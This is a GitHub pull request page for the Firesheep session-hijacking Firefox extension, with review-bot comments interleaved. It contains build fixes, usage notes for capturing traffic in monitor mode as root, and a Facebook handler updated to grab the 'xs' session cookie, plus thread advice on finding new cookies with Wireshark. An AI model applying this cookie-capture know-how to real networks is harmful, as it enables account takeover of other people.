Linux, documentation, firefox 8-10 and facebook handler fixes #160

Closed
wants to merge 9 commits into from

4 participants

Olivier Bilodeau Eric Butler Lorenzo Pistone Francesco Piccinno
Olivier Bilodeau

Merged pull request making HAL optional (#149) which fixes Linux problems. Then several small changes mostly documentation.

nopper and others added some commits
Francesco Piccinno nopper Updating .gitmodules file e939ac0
Francesco Piccinno nopper Fix to make hal dependency optional 23f8180
Olivier Bilodeau obilodeau Merge remote-tracking branch 'nopper/firefox5'
Conflicts:
	.gitmodules
997c29d
Olivier Bilodeau obilodeau updated documentation
- build instructions for ubuntu 11.04 and Backtrack 5
- noted that it works on Open SSIDs only
- usage notes for linux: interface in monitor mode required and run as root
da677e6
Olivier Bilodeau obilodeau ignoring linux build's temp files 8d21b5b
Olivier Bilodeau obilodeau Firefox 8 support
Tested with Firefox 8 on Ubuntu 11.10 and it worked just fine (as root).
d2df2b3
Olivier Bilodeau obilodeau fixed facebook handler 25e47fe
Olivier Bilodeau obilodeau documentation update regarding firefox as root
clarified that we must run under a real root user and not sudo otherwise firefox profile will corrupt
5d85d13
Olivier Bilodeau obilodeau Add-on compatibility bumped to Firefox 10
Successfully tested and working on 9.x and 10.x on Ubuntu 11.10
0be55a7
Olivier Bilodeau

Just re-tested the whole thing and it works great under FF10 on Ubuntu 11.10 catching facebook and linkedin.

Lorenzo Pistone

this doesn't seem to work, even though I can see that a parameter named 'xs' is effectively sent in the HTTP GET request nowadays. Any idea?

I know it doesn't work for mobile or touch facebook. For normal facebook it worked at the time but maybe facebook changed again...

Have you tried another handler to make sure you are set up correctly? If so, then the best way to fix this is to open wireshark and start firefox in a console, have another computer browse facebook and try to find the new cookie. You can modify handlers directly into firesheep.

Good luck

I have just tested. I can capture flickr, but not facebook (it does not even show up in the list). Wireshark shows these cookies: datr, lu, local, c_user, xs, act, presence, p. The domain is rightly www.facebook.com. If you have a cooked solution I'd be happy, otherwise I'm going to fiddle with the script when I have a bit of time.

Eric Butler
Owner

Please submit separate pull requests for any handler updates and use #149 to discuss the HAL issue. Thanks.

Eric Butler codebutler closed this
Commits on Sep 24, 2011
  1. Francesco Piccinno

    Updating .gitmodules file

    nopper authored
  2. Francesco Piccinno
Commits on Dec 24, 2011
  1. Olivier Bilodeau

    Merge remote-tracking branch 'nopper/firefox5'

    obilodeau authored
    Conflicts:
    	.gitmodules
Commits on Dec 26, 2011
  1. Olivier Bilodeau

    updated documentation

    obilodeau authored
    - build instructions for ubuntu 11.04 and Backtrack 5
    - noted that it works on Open SSIDs only
    - usage notes for linux: interface in monitor mode required and run as root
  2. Olivier Bilodeau
  3. Olivier Bilodeau

    Firefox 8 support

    obilodeau authored
    Tested with Firefox 8 on Ubuntu 11.10 and it worked just fine (as root).
  4. Olivier Bilodeau

    fixed facebook handler

    obilodeau authored
Commits on Feb 7, 2012
  1. Olivier Bilodeau

    documentation update regarding firefox as root

    obilodeau authored
    clarified that we must run under a real root user and not sudo otherwise firefox profile will corrupt
  2. Olivier Bilodeau

    Add-on compatibility bumped to Firefox 10

    obilodeau authored
    Successfully tested and working on 9.x and 10.x on Ubuntu 11.10
11 .gitignore
@@ -29,3 +29,14 @@ build/
*.user
*.swp
*~
+
+# Linux build temporary files
+depcomp
+libtool
+libtool.m4
+ltmain.sh
+ltoptions.m4
+ltsugar.m4
+ltversion.m4
+lt~obsolete.m4
+
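Review bot: The new entries (`depcomp`, `libtool`, `ltmain.sh` and the `lt*.m4` files) are unanchored, so they ignore any file or directory with those names at any depth, not only the generated files from the Linux build. If these are only produced at the top of the tree, prefix them with `/` (for example `/libtool`). The hunk also ends with an added blank line at the end of the file, which can be dropped.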
37 README.md
@@ -2,7 +2,9 @@
### **THIS BRANCH IS A WORK-IN-PROGRESS! Use the 'stable' branch (requires Firefox 3.x) instead!**
-A Firefox extension that demonstrates HTTP session hijacking attacks.
+A Firefox extension that demonstrates HTTP session hijacking attacks on Open (unencrypted) SSIDs.
+
+Extension will install on Firefox 6 to 10.
Created by:
@@ -34,6 +36,20 @@ See instructions for your platform below. When done, an xpi will be created insi
1. Install build dependencies (`sudo apt-get install autoconf libtool libpcap-dev libboost-all-dev libhal-dev`).
2. Run `./autogen.sh` then `make`.
+### Ubuntu Linux (11.10 Oneiric)
+
+1. Install build dependencies (`sudo apt-get install autoconf libtool libpcap-dev libboost-all-dev`).
+2. Run `./autogen.sh` then `make`.
+
+### Backtrack Linux 5 R1
+
+There is a build issue with libpcap-dev's version in BT5R1. See ticket [#157][7].
+
+1. Install build dependencies (`sudo apt-get install autoconf libtool libpcap-dev libboost-all-dev`).
+2. Run `./autogen.sh`
+3. Run `sed -i 's|L /usr/lib|L/usr/lib|g' config.status Makefile backend/Makefile` ([#157][7]'s workaround)
+4. Run `make`
+
### Windows
This has so far only been tested on Windows XP (32-bit), however the binaries work fine on Windows 7 too. If you can help simplify this process please let me know.
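Review bot: The build instructions do not mention the new `--enable-hal` configure switch, and the unchanged step 1 at the top of this hunk still installs `libhal-dev` even though configure.ac in this PR makes HAL opt-in. Please state in the README that HAL is off by default and how to turn it on, and either drop `libhal-dev` from the older instruction or mark it as needed only with `--enable-hal`. In the Backtrack section, step 3 edits generated files (`config.status`, `Makefile`, `backend/Makefile`), so the workaround is lost whenever configure is re-run; say so next to the step.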
@@ -44,8 +60,27 @@ This has so far only been tested on Windows XP (32-bit), however the binaries wo
4. Install [WinPcap][6].
5. From a Cygwin command prompt: Run `./autogen.sh`) then run `make`!
+## Usage notes
+
+### Linux
+
+1. You must select an interface in monitor mode to perform the attack. To do so if your card support it and you have aircrack-ng installed you do:
+
+ airmon-ng start <interface>
+
+2. Run firefox as root:
+
+ $ sudo su -
+ # firefox
+
+ Then select the mon0 interface.
+
+ WARNING: Do not run firefox with sudo (`sudo firefox`) as it will [corrupt your firefox profile][8].
+
[1]: http://mxcl.github.com/homebrew/
[3]: http://www.cygwin.com/
[4]: http://www.boostpro.com/download/
[5]: http://en.wikipedia.org/wiki/Promiscuous_mode
[6]: http://www.winpcap.org/install/default.htm
+[7]: https://github.com/codebutler/firesheep/issues/157
+[8]: http://ubuntuforums.org/showthread.php?t=952579
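Review bot: Step 2 tells users to run the whole browser as root, but the backend touched by this same PR already has a `LinuxPlatform::run_privileged()` path (backend/src/linux_platform.cpp), so the README should explain why that is not sufficient on Linux or limit root to the capture backend. A browser running as root is a much larger exposure than a capture helper, so at minimum recommend a dedicated throwaway profile for it. Smaller points: "if your card support it" should read "supports it", and reference `[8]` is a forum thread that may not stay available, so summarise the reason for the `sudo firefox` warning inline.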
43 backend/src/linux_platform.cpp
@@ -26,7 +26,10 @@
#include <cstdio>
#include <pcap/pcap.h>
#include "linux_platform.hpp"
+
+#ifndef DISABLE_HAL
#include <libhal.h>
+#endif
using namespace std;
using namespace boost;
@@ -43,6 +46,7 @@ bool LinuxPlatform::run_privileged()
return (ret == 0);
}
+#ifndef DISABLE_HAL
string device_get_property_string(LibHalContext *context, string device, string key, DBusError *error)
{
char *buf = libhal_device_get_property_string(context, device.c_str(), key.c_str(), error);
@@ -65,11 +69,14 @@ string device_get_property_string(LibHalContext *context, string device, string
return property;
}
+#endif
vector<InterfaceInfo> LinuxPlatform::interfaces()
{
vector<InterfaceInfo> result;
-
+
+#ifndef DISABLE_HAL
+
DBusError error;
LibHalContext *context;
char **devices;
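Review bot: The `-`/`+` pair on the blank line after `vector<InterfaceInfo> result;` changes only whitespace, and the same whitespace-only pairs repeat in the following hunks of this file. Please drop them from this PR, or move them to a separate cleanup commit, so that the `DISABLE_HAL` guards are the only thing to review here.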
@@ -79,7 +86,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
context = libhal_ctx_new();
if (context == NULL)
throw runtime_error("libhal_ctx_new() failed");
-
+
/* Initialize DBus connection */
dbus_error_init(&error);
if (!libhal_ctx_set_dbus_connection(context, dbus_bus_get(DBUS_BUS_SYSTEM, &error))) {
@@ -87,7 +94,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
LIBHAL_FREE_DBUS_ERROR(&error);
throw ex;
}
-
+
/* Initialize HAL context */
if (!libhal_ctx_init(context, &error)) {
if (dbus_error_is_set(&error)) {
@@ -106,7 +113,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
for (int i = 0; i < num_devices; i++) {
char *device = devices[i];
-
+
/* Get basic device information */
string iface = device_get_property_string(context, devices[i], "net.interface", &error);
string category = device_get_property_string(context, devices[i], "info.category", &error);
@@ -120,7 +127,7 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
type = "ethernet";
else
continue;
-
+
/* device points to a 'network inteface', get parent (physical?) device */
string parent = device_get_property_string(context, device, "net.originating_device", &error);
@@ -138,14 +145,34 @@ vector<InterfaceInfo> LinuxPlatform::interfaces()
string vendor = device_get_property_string(context, parent, "info.vendor", &error);
string product = device_get_property_string(context, parent, "info.product", &error);
string description(str(format("%s %s") % vendor % product));
-
+
InterfaceInfo info(iface, description, type);
result.push_back(info);
}
-
+
/* Free devices */
libhal_free_string_array(devices);
+#else
+ pcap_if_t *alldevs;
+ pcap_if_t *d;
+ char errbuf[PCAP_ERRBUF_SIZE+1];
+
+ if (pcap_findalldevs(&alldevs, errbuf) == -1) {
+ throw runtime_error(str(boost::format("Error in pcap_findalldevs: %s") % errbuf));
+ }
+
+ for (d = alldevs; d; d = d->next) {
+ string id(d->name);
+ boost::replace_all(id, "\\", "\\\\");
+ boost::replace_all(id, "{", "\\{");
+ boost::replace_all(id, "}", "\\}");
+ InterfaceInfo info(id, (string(d->description ? d->description : "No description")), "ethernet");
+ result.push_back(info);
+ }
+
+ pcap_freealldevs(alldevs);
+#endif
- return result;
+ return result;
}
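Review bot: In the `#else` branch every device returned by `pcap_findalldevs()` is added with the type hard-coded to `"ethernet"`, whereas the HAL branch classifies each device and skips the ones it does not recognise (`else continue;`). The fallback therefore also lists loopback and pseudo devices and mislabels wireless interfaces; at least skip entries with `PCAP_IF_LOOPBACK` set in `d->flags` and document that the type is unknown in this mode. The three `boost::replace_all` calls escape `\`, `{` and `}` in the device name, which needs a comment saying who consumes the escaped form, since the HAL branch passes `iface` through unescaped. `pcap_freealldevs(alldevs)` is also skipped if the `InterfaceInfo` constructor or `push_back` throws inside the loop, so free the list through a guard object. The final `return result;` pair is an indentation-only change.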
12 configure.ac
@@ -100,9 +100,19 @@ AC_SUBST(BOOST_STRING_ALGO_LIBS)
# END BOOST LIBS
if test x$FIRESHEEP_PLATFORM_NAME = xLINUX; then
- PKG_CHECK_MODULES(HAL, [hal])
+ AC_MSG_CHECKING(if --enable-hal option is specified)
+ AC_ARG_ENABLE(hal, [ --enable-hal enable HAL interface listing])
+
+ if test "$enable_hal" = "yes"; then
+ PKG_CHECK_MODULES(HAL, [hal])
+ else
+ HAL_CFLAGS="-DDISABLE_HAL"
+ HAL_LIBS=""
+ fi
+
AC_SUBST(HAL_CFLAGS)
AC_SUBST(HAL_LIBS)
+ AC_MSG_RESULT(${enable_hal-no})
fi
CXXFLAGS="-Wall -g -O0"
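Review bot: `AC_MSG_CHECKING` is issued before `PKG_CHECK_MODULES`, which prints its own checking and result lines, and the matching `AC_MSG_RESULT` only comes after the two `AC_SUBST` calls, so the configure output is interleaved when `--enable-hal` is given. Emit the result right after `AC_ARG_ENABLE`, before the `if`. The hunk also changes the default: HAL used to be required on Linux and is now off unless `--enable-hal` is passed, and any value other than `yes` silently disables it; that needs a line in the README and in the commit message. Consider `AS_HELP_STRING` for the option help and `AC_DEFINE` for `DISABLE_HAL` rather than placing a `-D` flag in `HAL_CFLAGS`.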
4 xpi/handlers/facebook.js
@@ -5,11 +5,11 @@ register({
name: 'Facebook',
url: 'https://www.facebook.com/home.php',
domains: [ 'facebook.com' ],
- sessionCookieNames: [ 'datr', 'c_user', 'lu', 'sct' ],
+ sessionCookieNames: [ 'datr', 'c_user', 'lu', 'xs' ],
processPacket: function () {
var cookies = this.firstPacket.cookies;
- this.sessionId = cookies.c_user + cookies.sct;
+ this.sessionId = cookies.c_user + cookies.xs;
},
identifyUser: function () {
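Review bot: `this.sessionId = cookies.c_user + cookies.xs;` concatenates the two values without checking that either is present, so unless the framework guarantees that every name in `sessionCookieNames` exists on the first packet, a missing `xs` produces an id ending in the literal string `undefined`. Check both cookies before building the id. The commit message ("fixed facebook handler") does not say what changed or how it was verified, and a participant in this thread reports the handler not matching even with `xs` present; as the owner asked, this belongs in its own pull request with that detail.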
2  xpi/install.rdf
@@ -23,7 +23,7 @@
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <!-- Firefox -->
<em:minVersion>6.0</em:minVersion>
- <em:maxVersion>7.0.*</em:maxVersion>
+ <em:maxVersion>10.0.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
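Review bot: `em:maxVersion` is raised to `10.0.*` for every platform, but the commit messages only record testing with Firefox 8, 9.x and 10.x on Ubuntu 11.10. Either note test results for the other supported platforms or say in the README that these versions are verified on Linux only. The README line "Extension will install on Firefox 6 to 10" duplicates `em:minVersion` and `em:maxVersion` and will drift; keep the range in one place or update both together.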